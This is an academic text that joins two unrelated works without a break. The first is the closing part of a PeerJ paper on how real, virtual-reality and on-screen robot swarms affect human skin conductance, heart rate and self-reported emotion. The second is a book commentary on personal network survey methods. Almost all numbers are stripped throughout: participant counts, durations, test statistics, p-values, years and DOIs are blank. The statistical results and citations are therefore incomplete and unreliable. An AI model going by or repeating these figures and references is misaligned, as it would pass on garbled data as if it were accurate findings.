obstacle in the direction of movement (i.e., it turns in place until the obstacle is no longer detected in the front part of its chassis). robot platform the platform used in this study is the wheeled e-puck robot (see fig. ) equipped with an extension board. the e-puck robot is designed for educational and research purposes (mondada et al., ). the extended version of the e-puck robot is cm high and has a diameter of cm. in this study, we used only a limited subset of the sensors and actuators available to the e-puck robot: the proximity sensors, and the wheel actuators. see mondada et al. ( ) and gutiérrez et al. ( ) for further details and for a complete list of the sensors and actuators available on the e-puck platform. we programmed the e-puck robots using the software infrastructure described in garattoni et al. ( ). participants we recruited participants from the campus population of the université libre de bruxelles. all participants were between and years old with an average age of . years old (sd = . ). we considered current or anterior cardiovascular problems that could act on the central nervous system as exclusion criteria (i.e., we excluded potential participants with cardiovascular problems). our participants received an informed consent form explaining that they were filmed during the experiment and that their physiological responses were being collected for research purpose only. at the end of the experiment, we offered a v financial incentive for participation. figure physiological measures. (a) the graph of a participant’s blood volume pulse during s. the bvp does not have a standard unit. the x-axis is the time in minutes since the beginning of the recording. the time between two peaks (depicted with two dots connected with a line on the picture) is called the inter-beat interval (ibi). the participant’s heart rate (the number of beats per minute) is computed by dividing by the inter-beat interval. in this example, the mean heart rate of the parti- cipant during these s is of bpm. (b) the graph of a participant’s skin conductance during s. the skin conductance’s unit is the microsiemens (y-axis). the x-axis is the time in minutes since the beginning of the recording. the skin conductance is computed by measuring the current flowing between two electrodes and by dividing this current by a constant voltage applied between the electrodes. the skin conductance level of this participant during these s is of . ms. podevijn et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ ethics statement our participants gave their written informed consent. the experiment was approved by the ethics committee of the faculty of psychology, université libre de bruxelles (approval number: / ). experimental procedure we conducted our experiments in the robotic experiment room of the artificial intelligence laboratory at the université libre de bruxelles. upon arrival, we explained to the participant that she was going to supervise, i.e., watch attentively, a swarm of robots with three different types of visualization interfaces (i.e., on a computer screen, in a virtual reality headset and in reality with real robots). we then showed to the participant the swarm of robots displayed in the three visualization interfaces. the participant was allowed to look at a computer screen displaying a top view of a swarm of robots, to wear the virtual reality headset and to look at the real robots. once the participant was familiar with the three visualization interfaces, we presented and explained how to answer the electronic version of the sam questionnaire. then, we invited the participant to read and sign the consent form. we then asked the participant to wash their hands in clear water (i.e., with no soap) and to remain seated on a chair placed in a corner of the environment used for the real robots session (see fig. ). we attached the participant to two physiological sensors (i.e., a pulse transducer for measuring the participants cardiovascular activity and two finger electrodes for measuring the participants electrodermal activity). we proceeded with a min rest period in order to collect the participant’s physiological baseline (i.e., physiological responses at rest). after the min rest period, we started the first session. after each session, we asked the participant to answer the sam questionnaire. before starting the next session of the experiment, we collected the participant’s baseline during an additional min rest period. this min rest period allowed the participant to get back to a normal physiological activity. during the whole duration of the experiment, the participant remained seated on the same chair. during the real robots session, the participant was immersed in the environment in which the robots were randomly moving. prior to the virtual reality session, we attached figure an e-puck robot used in our experiments. the proximity sensors are used to detect and avoid nearby robots. the wheel actuators are set to a speed of cm/s. podevijn et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ the virtual reality headset to the participant. prior to the screen simulation session, we placed a computer screen in front of the participant. after the experiment ended, we detached the sensors from the participant and conducted a brief interview with her. during the interview, we explained to the participant the goal of the study. then, we answered our participant’s questions. we finished the experiment by thanking the participant and by giving the participant the v incentive. the entire experiments duration was min per participant. data analysis and results out of the participants who took part to the experiment, we had to remove the physiological data (i.e., heart rate and skin conductance) of five participants due to sensor misplacement. we, however, kept the self-reported data (i.e., valence and arousal values reported by the sam questionnaire) of these five participants. in the following of this section, we analyse the psychophysiological data of participants ( female and male) and the self-reported data of participants ( female and male). we conducted our analyses with the r software (r core team, ) by performing a repeated measures design analysis. because the data was not normally distributed, we did not use the repeated measure anova test (as the test assumes a normal distribution). rather, we used a non-parametric friedman test to analyse both the psychophysiological data and the self-reported data (i.e., the sam questionnaire). the friedman test is a rank-based test that does not make any assumption on the distribution of the data. in our case, the friedman test’s null hypothesis is that the medians of the three sessions real robots, virtual reality and screen simulation are the same. in the case of statistical significance of the friedman test (i.e., at least one session has a different median), we performed a wilcoxon rank-signed test to evaluate the significance difference between sessions. when the wilcoxon rank-signed test performed on two sessions is significant, we can conclude that the medians of these two sessions are significantly different. we applied a bonferroni-holm correction to the p-values returned by the wilcoxon rank-signed test to take account of the type i error (i.e., reject the null hypothesis while it is true). in addition to determining the effect of the reality gap on our participants, we also determined whether psychophysiological data and self-reported data were correlated (e.g., whether skin conductance is correlated with arousal, or whether arousal and valence are correlated). in order to determine this correlation, we performed a spearman’s rank-order correlation test. we present in table the results of the psychophysiological and self-reported data (i.e., median and friedman’s mean rank of heart rate, scl, arousal and valence) in each session (i.e., real robots, virtual reality, screen simulation) as well as the inference statistics of the friedman tests (i.e., p-values and � ). psychophysiological data we did not find any main effect of the reality gap on our participants’ heart rate (� ( ) = . , p = . ). however, we found a main effect of the reality gap on our participants’ scl (� ( ) = . , p < . ). pairwise comparisons on the scl data podevijn et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ showed a statistical difference between the virtual reality session and the real robots session (z = . , p < . ) and between the screen simulation session and the real robots session (z = . , p < . ) but not between the screen simulation session and the virtual reality session (z = . , p = . ), see fig. b. self-reported data we found a main effect of the reality gap on our participants’ arousal (� ( ) = , p < . ) and on our participants’ valence (� ( ) = . , p < . ). pairwise comparisons on the arousal data showed statistical differences between the screen simulation session and the real robots session (z = . , p < . ) and between the screen simulation session and the virtual reality session (z = . , p < . ). there was no statistical difference between the virtual reality session and the real robots session (z = . , p = . ), see fig. c. pairwise comparisons on the valence data showed statistical differences between the virtual reality session and the real robots session (z = . , p < . ) and between the screen simulation session and the real robots session (z = , p < . ). pairwise comparisons do not show any statistical difference between the screen simulation session and the virtual reality session (z = . , p = . ), see fig. d. correlations in addition to studying the effect of the reality gap on our participants, we investigated whether or not some of the dependent variables (i.e., heart rate, skin conductance, arousal and valence) were pair-wise correlated. in order to calculate a correlation between psychophysiological data and self-reported data (e.g., correlation between skin conductance and arousal) we only took into account the self-reported data of the participants whose psychophysiological data had not been rejected (due to sensor misplacement). for the correlation test between arousal and valence we took the participant data points. we did not find any correlation within each of the three sessions (i.e., there was no correlation for any pair-wise dependent variable within the real robots session nor the virtual reality session nor the screen simulation session). we, therefore, investigated whether there was some correlations when the data of each condition was pooled together (e.g., we aggregated skin conductance values from the three sessions). regarding correlation between psychophysiological data and self-reported data, we found a correlation between skin conductance and valence (ρ = . , p < . ) and a weak correlation between skin conductance and arousal (ρ = . , p = . ). table results of the psychophysiological data and of the self-reported data. we provide the median and the friedman’s mean rank (in parentheses) of the three sessions (real robots, virtual reality, screen simulation). we also provide the inference statistics of the friedman test (i.e., � and p). dependent variable n real robots virtual reality screen simulation � p heart rate . ( . ) . ( ) . ( . ) � ( ) = . . scl . ( . ) . ( . ) . ( . ) � ( ) = . < . arousal ( . ) ( . ) ( . ) � ( ) = < . valence ( . ) ( . ) ( . ) � ( ) = . < . podevijn et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ there was no correlation between heart rate and valence and between heart rate and arousal. concerning the self-reported data, we found a correlation between arousal and valence (ρ = . , p = . ). we did not find any correlation between heart rate and skin conductance. gender effect and session order effect finally, we also studied the gender effect (i.e., whether females and males differ in their results) and the session order effect (i.e., whether the participants become habituated to the experiment). we analysed the gender effect by splitting into two groups the males’ and females’ results of each dependent variable (i.e., heart rate, skin conductance, arousal and valence) for each condition (i.e., screen simulation, virtual reality, real robots). we compared these two groups with a wilcoxon rank-sum test—the equivalent test of the wilcoxon rank-signed test for independent groups. we did not find any statistically significant difference between males and females in any condition, for any dependent variable. we studied the session order effect as follows. for each condition and for each dependent variable, we separated into three groups the results of the participants who encountered the session first, second or third, respectively. we compared the three groups with a kruskall-wallis test—a non-parametric test similar to a friedman test but for independent groups. we did not find any statistically significant difference among the figure (a) boxplots of the heart rate, (b) skin conductance level, (c) arousal and (d) valence. we visually report the median value of each session with the bold horizontal line. we report the outliers with the dots. two boxplots are connected when the sessions are significantly different. podevijn et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ three groups in any session, for any dependent variable, suggesting that the session order had no significant effect on our participants. discussion and conclusion in this paper, we presented a study on the effect of the reality gap on the psychophysiological reactions of humans interacting with a robot swarm. we had two hypotheses. the first hypothesis stated that humans interacting with a real (i.e., non- simulated) robot swarm have stronger psychophysiological reactions than if they were interacting with a simulated robot swarm. the second hypothesis stated that humans interacting with a simulated robot swarm displayed in a virtual reality environment have stronger psychophysiological reactions than if they were interacting with a simulated robot swarm displayed on a computer screen. both the self-reported data (i.e., arousal and valence) and the psychophysiological data (i.e., skin conductance) show that the reality gap has an effect on the human psychophysiological reactions. our participants had stronger psychophysiological reactions when they were confronted to a real swarm of robots than when they were confronted to a simulated robot swarm (in virtual reality and on a computer screen). these results confirm our first hypothesis. of course, it is not always possible for researchers to conduct a human-swarm interaction study with real robots, essentially because real robots are still very expensive for a research lab and real robot experiments are time consuming. it is, therefore, not realistic to expect human-swarm interaction researchers to conduct human-swarm interaction experiments with dozens or hundreds of real robots. for this reason, we decided to investigate the possibility of using virtual reality in order to mitigate the effect of the reality gap. to the best of our knowledge, virtual reality has yet never been used in the research field of human-swarm interaction and is little studied in social robotics (li, ). only the self-reported arousal show that our participants had stronger reactions during simulation in virtual reality than during simulation on a computer screen. with these results, we can not strongly confirm our second hypothesis. however, the results of the skin conductance and the self-reported valence, combined with the significant results of the arousal, both show a trend of our participants to have stronger psychophysiological responses in virtual reality than in front of a computer screen. in this paper, we designed our experiment based on a purely passive interaction scenario. in a passive interaction scenario, human operators do not issue commands to a robot swarm. we motivated our choice of a passive interaction by the fact that an active interaction could influence the human psychophysiological state (making it difficult to separate the effect of the active interaction and the effect of the reality gap on our participants’ psychophysiological state). however, now that we have shown the effect of the reality gap in a purely passive interaction scenario, future work should focus on this effect in an active interaction scenario in which human operators do issue commands to a robot swarm. for instance, we could use the results presented in this paper podevijn et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ as a baseline and compare them with those of an active interaction scenario in which human operators have to guide a swarm in an environment. in human-swarm interaction, as for any interactive system, it is fundamental to understand the psychological impact of the system on a human operator. to date, in human-swarm interaction research, such understanding is very limited, and worse is often based purely on the study of simulated systems. in this study, we showed that performing a human-swarm interaction study with real robots, compared to simulated robots, significantly changes how humans psychophysiologically react. we, therefore, recommend to use as much as possible real robots for human-swarm interaction research. we also showed that in simulation, a swarm displayed in virtual reality tends to provoke stronger responses than a swarm displayed on a computer screen. these results, therefore, tend to show that if it is not possible for a researcher to use real robots, virtual reality is a better choice than simulation on a computer screen. even though more research should focus on this statement, we encourage researchers in human-swarm interaction to consider using virtual reality when it is not possible to use a swarm of real robots. additional information and declarations funding this work was partially supported by the european research council through the erc advanced grant “e-swarm: engineering swarm intelligence systems” (contract ). rehan o’grady and marco dorigo received support from the belgian f.r.s.–fnrs. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: european research council through the erc advanced grant “e-swarm: engineering swarm intelligence systems”: . competing interests marco dorigo is an academic editor for peerj computer science. author contributions � gaëtan podevijn conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. � rehan o’grady conceived and designed the experiments, reviewed drafts of the paper. � carole fantini-hauwel conceived and designed the experiments, contributed reagents/ materials/analysis tools, reviewed drafts of the paper. � marco dorigo conceived and designed the experiments, contributed reagents/materials/ analysis tools, reviewed drafts of the paper. podevijn et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ ethics the following information was supplied relating to ethical approvals (i.e., approving body and any reference numbers): ethics committee of the faculty of psychology, université libre de bruxelles, approval number: / . data deposition the following information was supplied regarding data availability: the raw data has been supplied as supplemental dataset files. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . /peerj-cs. #supplemental-information. references amraii sa, walker p, lewis m, chakraborty n, sycara k. . explicit vs. tacit leadership in influencing the behavior of swarms. in: proceedings of ieee/rsj international conference on robotics and automation (icra). piscataway: ieee press, – . bashyal s, venayagamoorthy gk. . human swarm interaction for radiation source search and localization. in: swarm intelligence symposium. piscataway: ieee, – . bethel cl, burke jl, murphy rr, salomon k. . psychophysiological experimental design for use in human-robot interaction studies. in: proceedings of the international symposium on collaborative technologies and systems (cts). piscataway: ieee, – . boucsein w. . electrodermal activity. second edition. new york: springer science & business media. cacioppo jt, tassinary lg, berntson gg. . handbook of psychophysiology. vol. . new york: cambridge university press. carroll jm. . human-computer interaction: psychology as a science of design. annual review of psychology ( ): – doi . /annurev.psych. . . . de la croix j-p, egerstedt m. . controllability characterizations of leader-based swarm interactions. in: aaai fall symposium series technical reports. washington, d.c.: aaai press. dorigo m, birattari m, brambilla m. . swarm robotics. scholarpedia ( ): doi . /scholarpedia. . dorigo m, floreano d, gambardella lm, mondada f, nolfi s, baaboura t, birattari m, bonani m, brambilla m, brutschy a, burnier d, campo a, christensen al, decugnière a, di caro g, ducatelle f, ferrante e, förster a, guzzi j, longchamp v, magnenat s, martinez gonzales j, mathews n, montes de oca m, o’grady r, pinciroli c, pini g, rétornaz p, roberts j, sperati v, stirling t, stranieri a, stützle t, trianni v, tuci e, turgut ae, vaussard f. . swarmanoid: a novel concept for the study of heterogeneous robotic swarms. ieee robotics & automation magazine ( ): – doi . /mra. . . fasola j, matari�c m. . a socially assistive robot exercise coach for the elderly. journal of human-robot interaction ( ): – doi . /jhri. . .fasola. garattoni l, francesca g, brutschy a, pinciroli c, birattari m. . software infrastructure for e-puck (and tam). technical report tr/iridia/ - . brussels: iridia, université libre de bruxelles. available at http://iridia.ulb.ac.be/~lgarattoni/uploads/ / / / / / iridiatr - .pdf. podevijn et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /annurev.psych. . . http://dx.doi.org/ . /scholarpedia. http://dx.doi.org/ . /mra. . http://dx.doi.org/ . /jhri. . .fasola http://iridia.ulb.ac.be/~lgarattoni/uploads/ / / / / /iridiatr - .pdf http://iridia.ulb.ac.be/~lgarattoni/uploads/ / / / / /iridiatr - .pdf http://dx.doi.org/ . /peerj-cs. https://peerj.com/ gutiérrez a, campo a, dorigo m, amor d, magdalena l, monasterio-huelin f. . an open localization and local communication embodied sensor. sensors ( ): – doi . /s . hegel f, muhl c, wrede b, hielscher-fastabend m, sagerer g. . understanding social robots. in: proceedings of the nd international conferences on advances in computer-human interactions (achi ). piscataway: ieee, – . kidd c, breazeal c. . effect of a robot on user perceptions. in: proceedings of the ieee/rsj international conference on intelligent robots and system (iros) volume . piscataway: ieee computer society press, – . kolling a, sycara k, nunnally s, lewis m. . human swarm interaction: an experimental study of two types of interaction with foraging swarms. journal of human-robot interaction ( ): – doi . /jhri. . .kolling. kolling a, walker p, chakraborty n, sycara k, lewis m. . human interaction with robot swarms: a survey. ieee transaction on human-machine systems ( ): – doi . /thms. . . lang pj. . behavioral treatment and bio-behavioral assessment: computer applications. in: sidowski jb, johnson jh, williams th, eds. technology in mental health care delivery systems. norwood: ablex, – . leite i, pereira a, martinho c, paiva a. . are emotional robots more fun to play with? in: proceedings of the th ieee international symposium on robot and human interactive communication (roman). piscataway: ieee press, – . li j. . the benefit of being physically present: a survey of experimental works comparing copresent robots, telepresent robots and virtual agents. international journal of human- computer studies : – doi . /j.ijhcs. . . . mehrabian a. . pleasure-arousal-dominance: a general framework for describing and measuring individual differences in temperament. current psychology ( ): – doi . /bf . mondada f, bonani m, raemy x, pugh j, cianci c, klaptocz a, magnenat s, zufferey j-c, floreano d, martinoli a. . the e-puck, a robot designed for education in engineering. in: proceedings of the th conference on autonomous robot systems and competitions. portugal: instituto politècnico de castelo branco, – . nagavalli s, chien s-y, lewis m, chakraborty n, sycara k. . bounds of neglect benevolence in input timing for human interaction with robotic swarms. in: proceedings of acm/ieee international conference on human-robot interaction. new york: acm, – . nagi j, giusti a, gambardella lm, di caro ga. . human-swarm interaction using spatial gestures. in: proceedings of the th ieee/rsj international conference on intelligent robots and systems (iros). piscataway: ieee computer society, – . nagi j, ngo h, gambardella l, di caro ga. . wisdom of the swarm for human-swarm interaction. in: proceedings of the ieee international conference on robotics and automation (icra). piscataway: ieee, – . nunnally s, walker p, lewis m, kolling a, chakraborty n, sycara k. . connectivity differences between human operators of swarms and bandwidth limitations. in: proceedings of the third international conference on swarm, evolutionary, and memetic computing. berlin, heidelberg: springer, – . podevijn et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /s http://dx.doi.org/ . /jhri. . .kolling http://dx.doi.org/ . /thms. . http://dx.doi.org/ . /j.ijhcs. . . http://dx.doi.org/ . /bf http://dx.doi.org/ . /peerj-cs. https://peerj.com/ pendleton b, goodrich ma. . scalable human interaction with robotic swarms. in: proceedings of the aiaa infotech@aerospace conference. reston: american institute of aeronautics and astronautics, – . pereira a, martinho c, leite i, paiva a. . icat, the chess player: the influence of embodiment in the enjoyment of a game. in: proceedings of the th international joint conference on autonomous agents and multiagent systems. richland: international foundation for autonomous agents and multiagent systems, – . podevijn g, o’grady r, mathews n, gilles a, fantini-hauwel c, dorigo m. . investigating the effect of increasing robot group sizes on the human psychophysiological state in the context of human-swarm interaction. swarm intelligence ( ): – doi . /s - - - . podevijn g, o’grady r, nashed ysg, dorigo m. . gesturing at subswarms: towards direct human control of robot swarms. towards autonomous robotic systems– th annual conference, taros volume of lecture notes in computer science. berlin: springer, – . powers a, kiesler s, fussell s, torrey c. . comparing a computer agent with a humanoid robot. in: proceedings of the nd acm/ieee international conference on human-robot interaction (hri). new york: acm, – . r core team. . r: a language and environment for statistical computing. vienna, austria: r foundation for statistical computing. available at http://www.r-project.org/. setter t, fouraker a, kawashima h, egerstedt m. . haptic interactions with multi-robot swarms using manipulability. journal of human-robot interaction ( ): – doi . /jhri. . .setter. sweetser p, wyeth p. . gameflow: a model for evaluating player enjoyment in games. computers in entertainment ( ): doi . / . . wainer j, feil-seifer dj, shell da, matari�c mj. . embodiment and human-robot interaction: a task-based perspective. in: proceedings of the th ieee international symposium on robot and human interactive communication (roman). piscataway: ieee press, – . walker p, amraii sa, lewis m, chakraborty n, sycara k. . human control of leader-based swarms. in: ieee international conference on systems, man, and cybernetics (smc). piscataway: ieee press, – . walker p, nunnally s, lewis m, kolling a, chakraborty n, sycara k. . neglect benevolence in human-swarm interaction with communication latency. in: proceedings of the third international conference on swarm, evolutionary, and memetic computing. berlin: springer, – . wrobel j, wu y-h, kerhervé h, kamali l, rigaud a-s, jost c, le pévédic b, duhaut d. . effect of agent embodiment on the elder user enjoyment of a game. in: proceedings of the th international conference on advances in computer-human interactions (achi). red hook: iaria xps press, – . podevijn et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /s - - - http://www.r-project.org/ http://dx.doi.org/ . /jhri. . .setter http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. https://peerj.com/ investigating the effect of the reality gap on the human psychophysiological state in the context of human-swarm interaction introduction related literature methodology data analysis and results discussion and conclusion references © authors. this work is licensed under the creative commons attribution . license (https://creativecommons.org/licenses/by/ . /) issue | vol. article | doi: . /connections- . connections commentary: how to do personal network surveys: from name generators to statistical modeling isidro maya-jariego* universidad de sevilla seville, andalucía spain. *e-mail: isidromj@us.es abstract the book “conducting personal network research” is a conceptual and methodological introduction to the structural study of personal networks. it is part of a series of recent monographs that have begun to systematize the knowledge generated in this area in recent decades (crossley et al., ; mccarty et al., ; perry et al., ). in this case, the authors have dedicated a large part of their career to the empirical investigation of the interpersonal relationships, interaction contexts, and social integration processes of immigrants, along with other groups in vulnerable situations. with this publication, all this experience is now reflected in a clear and comprehensive introductory text. this book explains how to integrate relational data collection and analysis with survey research. it systematically presents the strategies to estimate the size of personal networks. finally, it describes how to fit statistical analysis to relational data, including regression models, multi-level models, and longitudinal models. keywords personal networks, name generators, statistical modelling, network surveys, ethics in research. the first time i showed the visualization of the personal network to a respondent i had the feeling of being in front of a tool with enormous potential. it was a case of a student who had just adopted a metropolitan lifestyle, moving almost daily between the city where she lived and the capital where she was studying at the university. the analysis of the structural properties of her personal network was a good way to describe the distribution of her relationships (and her life) between different socio- geographic spaces. on the other hand, by presenting the graph of her personal network, the respondent showed some surprise when she discovered some unknown structural properties of her own personal network. the visualization made her aware of some characteristics of her social world, although it had been designed based on the information she had provided. besides, the graphic representation natu- rally prompted a biographical discourse, providing explanations that helped to understand the contexts of interaction and the life events that had shaped her personal network. many of the potentials in those first experiences that research has subsequently developed were still at an early stage: the statistical analysis of the structural properties, the development of mixed methods strategies, the incorporation of the study of individual differences, the formulation of personal networks typologies, etc. the book conducting personal network research is a conceptual and methodological introduction to the structural study of personal networks. it forms part of a series of three new monographs aimed at systematizing the knowledge produced in this area in recent decades (crossley et al., ; mccarty et al., ; perry et al., ). in this case, the authors dedicated a large part of their career to empirical research on interpersonal relationships, contexts connections of interaction, and social integration processes of immigrants, along with other groups in situations of vulnerability. in this publication, all this experience is now reflected in a clear and comprehensive introductory text. one part of the book combines survey methodology with the study of personal networks. accordingly, it presents some basic notions about conducting sampling, how to ask questions, or which type of statistical analysis can be used at different levels of measurement. this type of content is clearly relevant for conducting surveys in general, and not only to those in which samples of personal networks are obtained. however, they help to understand the integration of personal network modules into surveys. as we will describe below, the main contribution of the book is the systematization of existing knowledge about the collection, analysis, and visualization of personal networks. this book review and commentary is a brief personal assessment of two methodological strategies that have emerged in recent decades as an effective way of analyzing personal networks, in part with the outstanding contribution of the authors of the book. the first of these strategies is the design of a pragmatic procedure to efficiently capture the diversity of personal networks, especially, if we consider the time-consuming nature of handling this type of relational data in surveys. the second is the statistical summary of the structural properties of personal network samples. among other reasons, because it is common to subsequently use these indicators in statistical analyzes with samples of respondents. anyway, before going into these two central contributions of the book, i will first provide a short reading guide to the introduction to personal network analysis. a reading guide on personal networks the three books on the study of personal networks previously mentioned have a similar structure. they begin with the description of relational data collection procedures. next, they present the analysis and visualization strategies of personal network data. finally, they dedicate several chapters to statistical analysis models. however, as we will do next, we can also highlight some unique characteristics of each of them. social network analysis for ego-nets (crossley et al., ) places the study of personal networks in the context of mixed methods and brings it into relation with social theory. it starts with a general introduction to network analysis and explains how ego-networks can also be extracted from whole social networks. following the tradition of the manchester school, it presents how to integrate personal network data with qualitative information or with ethnographic strategies. based on scientific evidence, it presents interesting reflections on the nature of relationships and their mutual dependence on interaction contexts. the section on “narratives, typologies and case studies” is especially suggestive on the very concept of social relationship, as well as its variability depending on the contexts of interaction. finally, in the chapters on statistical analysis, it follows a formal mathematical approach. egocentric network analysis (perry et al., ) is a book with an eminently pragmatic approach. sometimes it even goes down to the instrumental level, with instructions on how to carry out the analyzes, or even providing some lines of programming code. it presents the concepts very clearly and illustrates them with a magnificent selection of some of the best studies done in this area. this book clarifies the different analysis strategies to combine egocentric and sociocentric data. it shows with a sociological approach, how personal networks can serve to characterize different types of sociability and different forms of community life. it also describes how short- term, casual, serial relationships with low levels of interpersonal commitment predominate in the contem- porary world. conducting personal network research (mccarty et al., ) is an introductory book on personal network analysis that explains how to integrate relational data collection and analysis with survey research. it systematically presents the strategies to estimate the size of personal networks. finally, it describes how to fit statistical analysis to relational data, including regression models, multi-level models, and longitudinal models. consequently, these are three books that complement each other. with these three volumes, the reader can have a comprehensive and updated overview of the study of the structure of personal networks. below we focus on evaluating two of the fundamental contributions of the book by mccarty et al. ( ) that we anticipated before. name generators and relations generators the handbook defines itself as “a practical guide.” in that sense, two sections that best respond to the book’s subtitle are focused on “delineating personal networks” (chapter ) and “collecting data about ties between alters” (chapter ). these are two central methodological strategies in the collection of relational data. furthermore, both name generators and re- lationship generators have important substantive commentary: how to do personal network surveys: from name generators to statistical modeling implications, since they refer to the types of social contexts in which the individual is involved, as well as to the nature of the relationships. on the one hand, defining the boundaries of the network impacts the types of social contexts and the types of personal contacts on which we obtain information. on the other hand, for the structure finally observed (and, consequently, for information flows and social support, or social control processes) the type of links is a decisive factor. the work provides a comprehensive classification of the types of name generators. similarly, it systematically reviews the questions about alters and the relationships among them. the reading shows that this is an area where there is now potential for greater (both conceptual and methodological) systematization regarding data collection. for example, it is common to differentiate whole networks from personal networks (e.g., indicating that the former refers to a bounded group in a predefined context, while the latter covers all the contexts, social circles, and social settings in which the individual participates) hâncean et al. ( ). on paper, however, nothing is preventing the analysis of whole networks from being applied to two different contexts (e.g. a neighborhood and a workplace simultaneously). the personal network approach can also be adopted in the systematic study of a single interaction context. as an example, we can describe the personal networks of a sample of fishermen limited to their relationships in the fishing port (maya-jariego et al., ). it is a matter of design. therefore, taking into account these (less frequent) possibilities can help to specify which elements define (and which do not) the differentiation between the two basic approaches to network analysis. something similar happens with name generators. it has normally been distinguished between (i) obtaining information about a previously defined list of alters and (ii) obtaining names without any previous suggestion. the originality of the name generator proposed by mccarty ( ) is based on the free recall of respondents, but at the same time requesting a fixed number of alters. it is a rare combination since traditionally free recalling entailed not imposing limits on the number of alters that could be mentioned (maya-jariego, ). the nature of social relations occupies a central space throughout this process. in practice, the definition of the edge is determinant of the structure of the network. normally, any subsequent analysis is based on the perception of alter-alter relationships by respondents. although informants tend to be relatively unreliable when describing social interaction, in the case of personal networks, such accuracy generally increases, partly because these are routine ties with which “ego” has a direct relationship. additionally, perceived relationships have value in themselves, to the extent that they condition individual behavior. innovations in the analysis and visualization of personal networks christopher mccarty published in an article on the structure of personal networks that established a kind of standard in analysis and visualization strategies, consisting of (i) collecting information on a fixed number of alters, along with the relations that they maintain between them, (ii) disregarding the ego, and (iii) applying to personal networks the same type of structural analysis that previously was applied to complete social networks (mccarty, ). in a way, the book can be read as a compendium of the innovations that have been produced over almost two decades following this scheme. next, we mention some of the most prominent and promising novelties. reducing information, cohesive subgroups, and visualization one of the factors that have contributed to the dissemination of this approach among social science researchers is the facility to integrate analysis of personal network samples with traditional statistical analysis models and strategies. therefore, a large part of the effort has focused on identifying the type of indicators that provide an adequate summary of the structural properties and composition of the network. both the structural cohesion of the whole and the organization into defined subgroups are two key dimensions. the personal network has proved to be a space that “captures the context” of the respondents (luke, ). on the one hand, it represents the articulation of the social circles in which the individual participates. on the other hand, it indirectly reflects the relationships between the groups that compose this personal environment. finally, personal networks also have the potential to explore inter-individual differences, through the construction of typologies among other methodological options. in this context, visualization strategies are useful both for collecting personal network data and for developing qualitative interviews, often with a biographical component. they also allow the comparison of personal networks (e.g., through a standardized scheme of clustered graphs). the book has a section of color graphic representations that illustrates the structural and compositional properties connections of personal networks with a fixed number of or more alters. this section shows that visualization is not only a strategy for communicating research results but can easily be combined with qualitative strategies to deepen in ego’s point of view on relationships. accuracy, reliability, and statistical models for the rest, some of the classic themes in the study of structural properties are especially well treated, such as the accuracy and reliability of the information obtained, the estimation of the size of personal networks, or the ethics of network research. this is perhaps not surprising, as some of the authors have been especially active in those areas of research. to reduce the respondent burden, empirically validated recommendations are also provided. the book ends with the presentation of the most advanced models of multilevel analysis, which have revolutionized the possibilities of studying personal networks, combining many factors, and allowing the contrast of more complex hypotheses (snijders et al., ; wellman and frank, ). this section explains how to deal with multicollinearity problems when using multiple regression analysis. this is very practical for some areas of the social sciences where it remains one of the most widely used statistical models. among others, the relevance of principal component analysis and cluster analysis is reviewed. finally, the use of exponential random graph models (ergms) and stochastic actor-oriented models (saoms) to examining the formation of alter-alter ties are presented. the book is written in a clear and accessible way. on the one hand, it is suitable for an introductory level, as it presents the concepts from scratch, explains the most common mistakes, and illustrates the contents with examples based on experience. on the other hand, in each chapter, several boxes are included with a selection of particularly relevant research cases in the personal network literature. the latter not only makes reading more entertaining but also offers an enriching picture of some of the most significant findings of recent decades. among other cases, some studies are presented illustrating how to reach hard-to-reach populations, how to generate networks from a personal diary or from the phone contacts, how to estimate whole networks from personal networks, or how to build typologies. conclusion the book conducting personal network research is specially designed for those who approach the study of personal networks for the first time, starting from scratch. however, i think it will also be useful for researchers in the area, allowing them to reflect on how a valuable body of knowledge has been constituted on the structural properties of the social contexts where the individual is integrated. the recent publication of three manuals on the analysis of personal networks (crossley et al., ; mccarty et al., ; perry et al., ) involves the consolidation of a collection of methodological innovations that have reinforced the structural ap- proach in the study of personal communities. without a doubt, this systematization effort will inspire future research. the structure of the personal network is a space in which the relations between groups converge and it comprehensively captures the set of interaction contexts in which the individual participates. as this book shows, the last two decades have served to build a series of models, strategies, and research instruments that will multiply the productivity of this area of study in the coming years. when i come across some of the visualizations that we did in our first studies, now i can only look at them with new eyes. now we not only have a better understanding of the structure of personal networks but also the research questions have changed. the construction of typologies, the use of hybrid designs (combining personal networks and complete networks), and the improvement of multilevel analysis models are some of the steps that are already guessed along the way. reviewed by isidro maya jariego, social psy chology department, universidad de sevilla, spain references crossley, n., bellotti, e., edwards, g., everett, m. g., koskinen, j. and tranmer, m. . social network analysis for ego-nets: social network analysis for actor-centred networks. london: sage. hâncean, m. g., molina, j. l. and lubbers, m. j. . recent advancements, developments and applications of personal network analysis. international review of social research ( ): – . luke, d. a. . getting the big picture in community science: methods that capture context. american journal of community psychology ( - ): – . mccarty, c. . structure in personal networks. journal of social structure ( ): . mccarty, c., lubbers, m. j., vacca, r. and molina, j. l. . conducting personal network research: a practical guide. new york: guilford publications, pp. commentary: how to do personal network surveys: from name generators to statistical modeling maya-jariego, i. . why name generators with a fixed number of alters 